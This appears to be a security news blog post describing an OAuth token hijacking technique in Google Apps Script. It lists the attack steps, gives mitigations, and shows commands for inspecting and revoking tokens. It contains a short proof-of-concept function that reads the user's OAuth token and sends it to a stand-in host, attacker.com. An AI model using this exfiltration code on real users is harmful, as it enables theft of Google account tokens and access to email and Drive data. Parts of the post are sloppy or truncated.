-Click OAuth Token Hijacking on Google Apps Script: A Critical Security Risk

By /

Listen to this Post

Google Apps Script is a powerful tool for automating workflows across Google services, but a severe vulnerability exposes users to OAuth token hijacking. Attackers can exploit this flaw to gain unauthorized access to sensitive data, including emails, Drive files, contacts, and more—all with a single click.

You Should Know:

How the Exploit Works

  1. Malicious Script Injection: An attacker tricks a user into running a Google Apps Script with excessive OAuth scopes.
  2. Token Theft: The script silently captures the OAuth token, granting the attacker persistent access.
  3. Data Exfiltration: The stolen token allows access to:

– Google Drive (Docs, Sheets, Forms)
– Gmail (send emails, read inbox)
– Google Contacts
– Google Chat/Group conversations
– Google Classroom data

Proof-of-Concept Code

function maliciousAuth() {
// Requests broad OAuth scope under false pretenses 
const token = ScriptApp.getOAuthToken(); 
UrlFetchApp.fetch("https://attacker.com/steal?token=" + token); 
}

Mitigation Steps

1. Review Script Permissions:

  • Always audit scripts before granting access.
  • Use `https://script.google.com/home/permissions` to revoke suspicious tokens.

    2. Limit OAuth Scopes:

  • Avoid scripts requesting unnecessary permissions (e.g., `https://www.googleapis.com/auth/drive`).

    3. Monitor Token Activity:

    – Check `https://myaccount.google.com/security` for unusual access.

    4. Use Google Workspace Policies:

  • Admins should restrict third-party app integrations via admin.google.com.

Linux/Windows Commands for Token Analysis

  • Check Active Tokens (Linux): 
    curl -s "https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=TOKEN" | jq .
  • Revoke Tokens (Windows PowerShell): 
    Invoke-WebRequest -Uri "https://accounts.google.com/o/oauth2/revoke?token=TOKEN" -Method Post

What Undercode Say

Google’s dismissal of this flaw as a “trust issue” is alarming. OAuth hijacking undermines data integrity across Workspace ecosystems. Ethical hackers must push for stricter scope validation and user education. Meanwhile, sysadmins should enforce least-privilege principles and monitor script executions.

Expected Output:

References:

Reported By: Phhitachi Googlevrp – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Related Posts: